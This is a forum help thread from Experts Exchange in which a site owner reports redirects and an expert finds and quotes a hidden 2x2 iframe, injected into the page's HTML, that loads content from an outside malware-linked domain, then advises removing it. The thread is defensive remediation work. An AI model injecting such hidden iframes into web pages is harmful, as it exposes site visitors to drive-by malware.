Solved

Hijacked site

Posted on 2013-01-17
9
469 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to in on Expert Exchange, it seems that the site has been hijcked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machive and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Open in new window

                                           
Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site ?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first.. Thanks for taking a look

I don't suppose you would be able to tell my why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Open in new window


Did you place that there?
0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapast, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

Open in new window

and delete from <iframe> through to and including </iframe> for each instance.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0

Featured Post

Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Zeus black pop up screen virus 7 78
do i need anti virus software with windows 10? 13 96
EmsisoftAntiMalware is it trusted reliable 4 41
Rensome / malware protection 9 70
For those of you actively in the Malware fightling business, we now have available an amazing new tool in the malware wars (first recommended to me by rpggamergirl (http://www.experts-exchange.com/M_3598771.html), the Zone Advisor for the Virus and …
There are many reasons malware will stay around and continue to grow as a business.  The biggest reason is the expanding customer base.  More than 40% of people who are infected with ransomware, pay the ransom.  That makes ransomware a multi-million…
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

735 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question